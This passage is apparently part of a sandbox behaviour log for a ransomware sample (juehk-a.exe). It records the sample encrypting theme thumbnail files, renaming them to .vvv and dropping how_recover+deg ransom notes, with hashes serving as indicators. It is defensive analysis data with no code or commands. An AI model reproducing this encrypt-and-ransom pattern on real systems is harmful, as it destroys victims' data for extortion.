21815.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21816.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21817.            ads:
21818.          fid (ads:): 562949953521304
21819.          ntstatus: 0x0
21820.          CreateOptions: 0x0
21821.        file:
21822.          timestamp: 84798
21823.          mode: created
21824.          sequenceNumber: 1535
21825.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ECLIPSE\how_recover+deg.html
21826.          processinfo:
21827.            pid: 1648
21828.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21829.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21830.            ads:
21831.          fid (ads:): 562949953521305
21832.          ntstatus: 0x0
21833.          CreateOptions: 0x60
21834.        file:
21835.          timestamp: 84804
21836.          mode: close
21837.          sequenceNumber: 1536
21838.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ECLIPSE\how_recover+deg.html
21839.          filesize: 9480
21840.          md5sum: a68c3caf0be8f1a393c697136926cfd4
21841.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
21842.          processinfo:
21843.            pid: 1648
21844.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21845.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21846.            ads:
21847.          fid (ads:): 562949953521305
21848.          ntstatus: 0x0
21849.          CreateOptions: 0x0
21850.        file:
21851.          timestamp: 84810
21852.          mode: open
21853.          sequenceNumber: 1537
21854.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\EDGE\THMBNAIL.PNG
21855.          filesize: 26402
21856.          processinfo:
21857.            pid: 1648
21858.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21859.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21860.            ads:
21861.          fid (ads:): 562949953499624
21862.          ntstatus: 0x0
21863.          CreateOptions: 0x60
21864.        file:
21865.          timestamp: 84819
21866.          mode: close
21867.          sequenceNumber: 1538
21868.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\EDGE\THMBNAIL.PNG
21869.          filesize: 26830
21870.          md5sum: 39b59588e6a4fabed96de52ea74efde3
21871.          sha1sum: f4c682ad9aaa2f27109082283caeaa53819c24da
21872.          processinfo:
21873.            pid: 1648
21874.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21875.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21876.            ads:
21877.          fid (ads:): 562949953499624
21878.          ntstatus: 0x0
21879.          CreateOptions: 0x0
21880.        file:
21881.          timestamp: 84847
21882.          mode: rename
21883.          sequenceNumber: 1539
21884.          filesize: 26830
21885.          md5sum: 39b59588e6a4fabed96de52ea74efde3
21886.          sha1sum: f4c682ad9aaa2f27109082283caeaa53819c24da
21887.          processinfo:
21888.            pid: 1648
21889.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21890.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21891.          old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\EDGE\THMBNAIL.PNG
21892.          new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\EDGE\THMBNAIL.PNG.vvv
21893.            ads:
21894.          fid (ads:): 562949953499624
21895.          ntstatus: 0x0
21896.          CreateOptions: 0x0
21897.        file:
21898.          timestamp: 84863
21899.          mode: created
21900.          sequenceNumber: 1540
21901.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\EDGE\how_recover+deg.txt
21902.          processinfo:
21903.            pid: 1648
21904.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21905.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21906.            ads:
21907.          fid (ads:): 2533274790494413
21908.          ntstatus: 0x0
21909.          CreateOptions: 0x60
21910.        file:
21911.          timestamp: 84869
21912.          mode: close
21913.          sequenceNumber: 1541
21914.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\EDGE\how_recover+deg.txt
21915.          filesize: 2673
21916.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
21917.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
21918.          processinfo:
21919.            pid: 1648
21920.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21921.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21922.            ads:
21923.          fid (ads:): 2533274790494413
21924.          ntstatus: 0x0
21925.          CreateOptions: 0x0
21926.        file:
21927.          timestamp: 84875
21928.          mode: created
21929.          sequenceNumber: 1542
21930.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\EDGE\how_recover+deg.html
21931.          processinfo:
21932.            pid: 1648
21933.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21934.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21935.            ads:
21936.          fid (ads:): 562949953521306
21937.          ntstatus: 0x0
21938.          CreateOptions: 0x60
21939.        file:
21940.          timestamp: 84880
21941.          mode: close
21942.          sequenceNumber: 1543
21943.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\EDGE\how_recover+deg.html
21944.          filesize: 9480
21945.          md5sum: a68c3caf0be8f1a393c697136926cfd4
21946.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
21947.          processinfo:
21948.            pid: 1648
21949.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21950.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21951.            ads:
21952.          fid (ads:): 562949953521306
21953.          ntstatus: 0x0
21954.          CreateOptions: 0x0
21955.        file:
21956.          timestamp: 84889
21957.          mode: open
21958.          sequenceNumber: 1544
21959.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\EVRGREEN\THMBNAIL.PNG
21960.          filesize: 32433
21961.          processinfo:
21962.            pid: 1648
21963.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21964.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21965.            ads:
21966.          fid (ads:): 562949953499625
21967.          ntstatus: 0x0
21968.          CreateOptions: 0x60
21969.        file:
21970.          timestamp: 84920
21971.          mode: close
21972.          sequenceNumber: 1545
21973.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\EVRGREEN\THMBNAIL.PNG
21974.          filesize: 32862
21975.          md5sum: fd786df1c118c1ff73ce750e31ff2ceb
21976.          sha1sum: 14f4a05666e4e014ec425a97152074f7684dba05
21977.          processinfo:
21978.            pid: 1648
21979.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21980.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21981.            ads:
21982.          fid (ads:): 562949953499625
21983.          ntstatus: 0x0
21984.          CreateOptions: 0x0
21985.        file:
21986.          timestamp: 84938
21987.          mode: rename
21988.          sequenceNumber: 1546
21989.          filesize: 32862
21990.          md5sum: fd786df1c118c1ff73ce750e31ff2ceb
21991.          sha1sum: 14f4a05666e4e014ec425a97152074f7684dba05
21992.          processinfo:
21993.            pid: 1648
21994.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
21995.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
21996.          old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\EVRGREEN\THMBNAIL.PNG
21997.          new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\EVRGREEN\THMBNAIL.PNG.vvv
21998.            ads:
21999.          fid (ads:): 562949953499625
22000.          ntstatus: 0x0
22001.          CreateOptions: 0x0
22002.        file:
22003.          timestamp: 84952
22004.          mode: created
22005.          sequenceNumber: 1547
22006.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\EVRGREEN\how_recover+deg.txt
22007.          processinfo:
22008.            pid: 1648
22009.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22010.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22011.            ads:
22012.          fid (ads:): 562949953521307
22013.          ntstatus: 0x0
22014.          CreateOptions: 0x60
22015.        file:
22016.          timestamp: 84958
22017.          mode: close
22018.          sequenceNumber: 1548
22019.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\EVRGREEN\how_recover+deg.txt
22020.          filesize: 2673
22021.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
22022.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
22023.          processinfo:
22024.            pid: 1648
22025.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22026.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22027.            ads:
22028.          fid (ads:): 562949953521307
22029.          ntstatus: 0x0
22030.          CreateOptions: 0x0
22031.        file:
22032.          timestamp: 84977
22033.          mode: created
22034.          sequenceNumber: 1549
22035.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\EVRGREEN\how_recover+deg.html
22036.          processinfo:
22037.            pid: 1648
22038.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22039.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22040.            ads:
22041.          fid (ads:): 562949953521308
22042.          ntstatus: 0x0
22043.          CreateOptions: 0x60
22044.        file:
22045.          timestamp: 84983
22046.          mode: close
22047.          sequenceNumber: 1550
22048.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\EVRGREEN\how_recover+deg.html
22049.          filesize: 9480
22050.          md5sum: a68c3caf0be8f1a393c697136926cfd4
22051.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
22052.          processinfo:
22053.            pid: 1648
22054.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22055.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22056.            ads:
22057.          fid (ads:): 562949953521308
22058.          ntstatus: 0x0
22059.          CreateOptions: 0x0
22060.        file:
22061.          timestamp: 84990
22062.          mode: open
22063.          sequenceNumber: 1551
22064.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\EXPEDITN\THMBNAIL.PNG
22065.          filesize: 60724
22066.          processinfo:
22067.            pid: 1648
22068.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22069.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22070.            ads:
22071.          fid (ads:): 562949953499626
22072.          ntstatus: 0x0
22073.          CreateOptions: 0x60
22074.        file:
22075.          timestamp: 85010
22076.          mode: close
22077.          sequenceNumber: 1552
22078.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\EXPEDITN\THMBNAIL.PNG
22079.          filesize: 61150
22080.          md5sum: bd0feffe875b9257b037940cb6058f10
22081.          sha1sum: 4711b9055246b70b36c334788a552a3d1ef27727
22082.          processinfo:
22083.            pid: 1648
22084.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22085.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22086.            ads:
22087.          fid (ads:): 562949953499626
22088.          ntstatus: 0x0
22089.          CreateOptions: 0x0
22090.        file:
22091.          timestamp: 85026
22092.          mode: rename
22093.          sequenceNumber: 1553
22094.          filesize: 61150
22095.          md5sum: bd0feffe875b9257b037940cb6058f10
22096.          sha1sum: 4711b9055246b70b36c334788a552a3d1ef27727
22097.          processinfo:
22098.            pid: 1648
22099.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22100.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22101.          old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\EXPEDITN\THMBNAIL.PNG
22102.          new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\EXPEDITN\THMBNAIL.PNG.vvv
22103.            ads:
22104.          fid (ads:): 562949953499626
22105.          ntstatus: 0x0
22106.          CreateOptions: 0x0
22107.        file:
22108.          timestamp: 85131
22109.          mode: created
22110.          sequenceNumber: 1554
22111.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\EXPEDITN\how_recover+deg.txt
22112.          processinfo:
22113.            pid: 1648
22114.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22115.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22116.            ads:
22117.          fid (ads:): 562949953521309
22118.          ntstatus: 0x0
22119.          CreateOptions: 0x60
22120.        file:
22121.          timestamp: 85137
22122.          mode: close
22123.          sequenceNumber: 1555
22124.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\EXPEDITN\how_recover+deg.txt
22125.          filesize: 2673
22126.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
22127.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
22128.          processinfo:
22129.            pid: 1648
22130.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22131.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22132.            ads:
22133.          fid (ads:): 562949953521309
22134.          ntstatus: 0x0
22135.          CreateOptions: 0x0
22136.        file:
22137.          timestamp: 85145
22138.          mode: created
22139.          sequenceNumber: 1556
22140.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\EXPEDITN\how_recover+deg.html
22141.          processinfo:
22142.            pid: 1648
22143.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22144.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22145.            ads:
22146.          fid (ads:): 562949953521310
22147.          ntstatus: 0x0
22148.          CreateOptions: 0x60
22149.        file:
22150.          timestamp: 85152
22151.          mode: close
22152.          sequenceNumber: 1557
22153.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\EXPEDITN\how_recover+deg.html
22154.          filesize: 9480
22155.          md5sum: a68c3caf0be8f1a393c697136926cfd4
22156.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
22157.          processinfo:
22158.            pid: 1648
22159.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22160.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22161.            ads:
22162.          fid (ads:): 562949953521310
22163.          ntstatus: 0x0
22164.          CreateOptions: 0x0
22165.        file:
22166.          timestamp: 85179
22167.          mode: open
22168.          sequenceNumber: 1558
22169.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ICE\THMBNAIL.PNG
22170.          filesize: 18817
22171.          processinfo:
22172.            pid: 1648
22173.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22174.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22175.            ads:
22176.          fid (ads:): 562949953499627
22177.          ntstatus: 0x0
22178.          CreateOptions: 0x60
22179.        file:
22180.          timestamp: 85648
22181.          mode: close
22182.          sequenceNumber: 1559
22183.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ICE\THMBNAIL.PNG
22184.          filesize: 19246
22185.          md5sum: df0b3ea6858fcad1cba1f3b2acd827d9
22186.          sha1sum: ff49c6ec871d5da08d9667855f70047486a1c80e
22187.          processinfo:
22188.            pid: 1648
22189.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22190.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22191.            ads:
22192.          fid (ads:): 562949953499627
22193.          ntstatus: 0x0
22194.          CreateOptions: 0x0
22195.        file:
22196.          timestamp: 85658
22197.          mode: rename
22198.          sequenceNumber: 1560
22199.          filesize: 19246
22200.          md5sum: df0b3ea6858fcad1cba1f3b2acd827d9
22201.          sha1sum: ff49c6ec871d5da08d9667855f70047486a1c80e
22202.          processinfo:
22203.            pid: 1648
22204.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22205.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22206.          old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ICE\THMBNAIL.PNG
22207.          new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ICE\THMBNAIL.PNG.vvv
22208.            ads:
22209.          fid (ads:): 562949953499627
22210.          ntstatus: 0x0
22211.          CreateOptions: 0x0
22212.        file:
22213.          timestamp: 85695
22214.          mode: created
22215.          sequenceNumber: 1561
22216.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ICE\how_recover+deg.txt
22217.          processinfo:
22218.            pid: 1648
22219.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22220.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22221.            ads:
22222.          fid (ads:): 562949953521311
22223.          ntstatus: 0x0
22224.          CreateOptions: 0x60
22225.        file:
22226.          timestamp: 85702
22227.          mode: close
22228.          sequenceNumber: 1562
22229.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ICE\how_recover+deg.txt
22230.          filesize: 2673
22231.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
22232.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
22233.          processinfo:
22234.            pid: 1648
22235.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22236.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22237.            ads:
22238.          fid (ads:): 562949953521311
22239.          ntstatus: 0x0
22240.          CreateOptions: 0x0
22241.        file:
22242.          timestamp: 85711
22243.          mode: created
22244.          sequenceNumber: 1563
22245.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ICE\how_recover+deg.html
22246.          processinfo:
22247.            pid: 1648
22248.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22249.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22250.            ads:
22251.          fid (ads:): 562949953521312
22252.          ntstatus: 0x0
22253.          CreateOptions: 0x60
22254.        file:
22255.          timestamp: 85716
22256.          mode: close
22257.          sequenceNumber: 1564
22258.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ICE\how_recover+deg.html
22259.          filesize: 9480
22260.          md5sum: a68c3caf0be8f1a393c697136926cfd4
22261.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
22262.          processinfo:
22263.            pid: 1648
22264.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22265.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22266.            ads:
22267.          fid (ads:): 562949953521312
22268.          ntstatus: 0x0
22269.          CreateOptions: 0x0
22270.        file:
22271.          timestamp: 85724
22272.          mode: open
22273.          sequenceNumber: 1565
22274.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\INDUST\THMBNAIL.PNG
22275.          filesize: 33559
22276.          processinfo:
22277.            pid: 1648
22278.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22279.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22280.            ads:
22281.          fid (ads:): 562949953499628
22282.          ntstatus: 0x0
22283.          CreateOptions: 0x60
22284.        file:
22285.          timestamp: 85780
22286.          mode: close
22287.          sequenceNumber: 1566
22288.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\INDUST\THMBNAIL.PNG
22289.          filesize: 33982
22290.          md5sum: e83346f5493fd82eba093df659e0d106
22291.          sha1sum: 5a06ddcfada54831dd54b87255843d55ca423f46
22292.          processinfo:
22293.            pid: 1648
22294.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22295.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22296.            ads:
22297.          fid (ads:): 562949953499628
22298.          ntstatus: 0x0
22299.          CreateOptions: 0x0
22300.        file:
22301.          timestamp: 85788
22302.          mode: rename
22303.          sequenceNumber: 1567
22304.          filesize: 33982
22305.          md5sum: e83346f5493fd82eba093df659e0d106
22306.          sha1sum: 5a06ddcfada54831dd54b87255843d55ca423f46
22307.          processinfo:
22308.            pid: 1648
22309.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22310.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22311.          old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\INDUST\THMBNAIL.PNG
22312.          new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\INDUST\THMBNAIL.PNG.vvv
22313.            ads:
22314.          fid (ads:): 562949953499628
22315.          ntstatus: 0x0
22316.          CreateOptions: 0x0
22317.        file:
22318.          timestamp: 85797
22319.          mode: created
22320.          sequenceNumber: 1568
22321.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\INDUST\how_recover+deg.txt
22322.          processinfo:
22323.            pid: 1648
22324.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22325.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22326.            ads:
22327.          fid (ads:): 562949953521313
22328.          ntstatus: 0x0
22329.          CreateOptions: 0x60
22330.        file:
22331.          timestamp: 85803
22332.          mode: close
22333.          sequenceNumber: 1569
22334.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\INDUST\how_recover+deg.txt
22335.          filesize: 2673
22336.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
22337.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
22338.          processinfo:
22339.            pid: 1648
22340.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22341.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22342.            ads:
22343.          fid (ads:): 562949953521313
22344.          ntstatus: 0x0
22345.          CreateOptions: 0x0
22346.        file:
22347.          timestamp: 85810
22348.          mode: created
22349.          sequenceNumber: 1570
22350.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\INDUST\how_recover+deg.html
22351.          processinfo:
22352.            pid: 1648
22353.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22354.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22355.            ads:
22356.          fid (ads:): 562949953521314
22357.          ntstatus: 0x0
22358.          CreateOptions: 0x60
22359.        file:
22360.          timestamp: 85819
22361.          mode: close
22362.          sequenceNumber: 1571
22363.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\INDUST\how_recover+deg.html
22364.          filesize: 9480
22365.          md5sum: a68c3caf0be8f1a393c697136926cfd4
22366.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
22367.          processinfo:
22368.            pid: 1648
22369.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22370.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22371.            ads:
22372.          fid (ads:): 562949953521314
22373.          ntstatus: 0x0
22374.          CreateOptions: 0x0
22375.        file:
22376.          timestamp: 85836
22377.          mode: open
22378.          sequenceNumber: 1572
22379.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\IRIS\THMBNAIL.PNG
22380.          filesize: 19485
22381.          processinfo:
22382.            pid: 1648
22383.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22384.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22385.            ads:
22386.          fid (ads:): 562949953499629
22387.          ntstatus: 0x0
22388.          CreateOptions: 0x60
22389.        file:
22390.          timestamp: 85906
22391.          mode: close
22392.          sequenceNumber: 1573
22393.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\IRIS\THMBNAIL.PNG
22394.          filesize: 19902
22395.          md5sum: 4150a65a1c09de30ba141fb2d3f5dd3e
22396.          sha1sum: 0324527c0e07290d41bbaa2f601cb79b64fbaec3
22397.          processinfo:
22398.            pid: 1648
22399.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22400.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22401.            ads:
22402.          fid (ads:): 562949953499629
22403.          ntstatus: 0x0
22404.          CreateOptions: 0x0
22405.        file:
22406.          timestamp: 85916
22407.          mode: rename
22408.          sequenceNumber: 1574
22409.          filesize: 19902
22410.          md5sum: 4150a65a1c09de30ba141fb2d3f5dd3e
22411.          sha1sum: 0324527c0e07290d41bbaa2f601cb79b64fbaec3
22412.          processinfo:
22413.            pid: 1648
22414.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22415.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22416.          old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\IRIS\THMBNAIL.PNG
22417.          new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\IRIS\THMBNAIL.PNG.vvv
22418.            ads:
22419.          fid (ads:): 562949953499629
22420.          ntstatus: 0x0
22421.          CreateOptions: 0x0
22422.        file:
22423.          timestamp: 85950
22424.          mode: created
22425.          sequenceNumber: 1575
22426.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\IRIS\how_recover+deg.txt
22427.          processinfo:
22428.            pid: 1648
22429.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22430.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22431.            ads:
22432.          fid (ads:): 1688849860362642
22433.          ntstatus: 0x0
22434.          CreateOptions: 0x60
22435.        file:
22436.          timestamp: 85963
22437.          mode: close
22438.          sequenceNumber: 1576
22439.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\IRIS\how_recover+deg.txt
22440.          filesize: 2673
22441.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
22442.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
22443.          processinfo:
22444.            pid: 1648
22445.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22446.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22447.            ads:
22448.          fid (ads:): 1688849860362642
22449.          ntstatus: 0x0
22450.          CreateOptions: 0x0
22451.        file:
22452.          timestamp: 85969
22453.          mode: created
22454.          sequenceNumber: 1577
22455.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\IRIS\how_recover+deg.html
22456.          processinfo:
22457.            pid: 1648
22458.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22459.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22460.            ads:
22461.          fid (ads:): 562949953521315
22462.          ntstatus: 0x0
22463.          CreateOptions: 0x60
22464.        file:
22465.          timestamp: 85973
22466.          mode: close
22467.          sequenceNumber: 1578
22468.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\IRIS\how_recover+deg.html
22469.          filesize: 9480
22470.          md5sum: a68c3caf0be8f1a393c697136926cfd4
22471.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
22472.          processinfo:
22473.            pid: 1648
22474.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22475.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22476.            ads:
22477.          fid (ads:): 562949953521315
22478.          ntstatus: 0x0
22479.          CreateOptions: 0x0
22480.        file:
22481.          timestamp: 85982
22482.          mode: open
22483.          sequenceNumber: 1579
22484.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\JOURNAL\THMBNAIL.PNG
22485.          filesize: 18413
22486.          processinfo:
22487.            pid: 1648
22488.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22489.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22490.            ads:
22491.          fid (ads:): 562949953499630
22492.          ntstatus: 0x0
22493.          CreateOptions: 0x60
22494.        file:
22495.          timestamp: 86003
22496.          mode: close
22497.          sequenceNumber: 1580
22498.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\JOURNAL\THMBNAIL.PNG
22499.          filesize: 18830
22500.          md5sum: b9c216033da886a3f6e58fd2fb884d3c
22501.          sha1sum: 29ac88b7cc1a6eacdbf7ff377f08b89e6d981f0c
22502.          processinfo:
22503.            pid: 1648
22504.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22505.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22506.            ads:
22507.          fid (ads:): 562949953499630
22508.          ntstatus: 0x0
22509.          CreateOptions: 0x0
22510.        file:
22511.          timestamp: 86012
22512.          mode: rename
22513.          sequenceNumber: 1581
22514.          filesize: 18830
22515.          md5sum: b9c216033da886a3f6e58fd2fb884d3c
22516.          sha1sum: 29ac88b7cc1a6eacdbf7ff377f08b89e6d981f0c
22517.          processinfo:
22518.            pid: 1648
22519.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22520.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22521.          old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\JOURNAL\THMBNAIL.PNG
22522.          new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\JOURNAL\THMBNAIL.PNG.vvv
22523.            ads:
22524.          fid (ads:): 562949953499630
22525.          ntstatus: 0x0
22526.          CreateOptions: 0x0
22527.        file:
22528.          timestamp: 86070
22529.          mode: created
22530.          sequenceNumber: 1582
22531.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\JOURNAL\how_recover+deg.txt
22532.          processinfo:
22533.            pid: 1648
22534.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22535.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22536.            ads:
22537.          fid (ads:): 562949953521316
22538.          ntstatus: 0x0
22539.          CreateOptions: 0x60
22540.        file:
22541.          timestamp: 86080
22542.          mode: close
22543.          sequenceNumber: 1583
22544.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\JOURNAL\how_recover+deg.txt
22545.          filesize: 2673
22546.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
22547.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
22548.          processinfo:
22549.            pid: 1648
22550.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22551.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22552.            ads:
22553.          fid (ads:): 562949953521316
